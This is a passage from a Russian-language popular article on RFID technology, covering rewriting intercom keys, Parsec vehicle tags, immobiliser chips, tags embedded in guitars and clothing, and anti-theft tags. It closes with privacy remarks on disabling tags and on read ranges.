При этом при каждом открывании двери данные в ключе перезаписываются, таким образом невозможно увеличить количество ключей. Копия будет работать, но после первого открывания перестанет работать оригинал, так как данные в ключе меняются. Этим хитрым апгрейдом факториал разом сделал бизнес копирования домофонных ключей невозможным.

Активные метки parsec

Представляют собой герметичный контейнер с микроконтроллером, батарейкой и радиомодулем, который посылает в эфир пару раз в секунду свой уникальный номер. Закрепив такой на автомобиле можно определять какие авто на данный момент сейчас находятся к примеру в гараже. Основная задача этих меток в автоматическом открывании ворот и шлагбаумов.

При этом вариант на последнем фото снабжен еще и пассивной меткой, можно повесить как брелок для ключей, и открывать не только ворота но и двери.

Правда безопасность автомобиля, основанная на наличии такой метки уязвима .

Если разберем ключ от автомобиля то найдем в нем чип иммобилайзера, который по сути тоже RFID метка:

Справа на крышке. Надежность и секретность механических замков ограничивается точностью механической обработки и достигла своего предела. Электронные замки и ключи имеют значительно большее число комбинаций.

RFID метки могут внедряться на стадии производства, например гитар:

Производитель таким образом не только облегчает себе отслеживание продукции на складах, но и гарантирует себе способ отличить свою продукцию от подделок.

Вот шапка с RFID меткой пришитой при производстве:

Еще одна от куртки:

Немного растворителей и достаем метки:

Отдельного слова заслуживают так называемые противокражные метки, или 1-битные транспондеры. Это RFID метка которая передает всего 1 бит – информацию о своем наличии. Такие метки используются для защиты товара от краж. Я про одну такую. Чаще всего встречаются метки электромагнитной системы (метка – колебательный контур), и акустомагнитной. Метки других типов в наших краях встречаются редко.

Если вы параноик

Возможно вам пригодится RFID Zapper . Перманентно отключить метку можно также в микроволновке, просто включив на пару секунд. Пассивные метки считываются на расстоянии в несколько метров (для LF и HF вообще не более 20 см). Что бы считать метку на расстоянии 100 метров в считыватель придется закачивать неприлично большие мощности.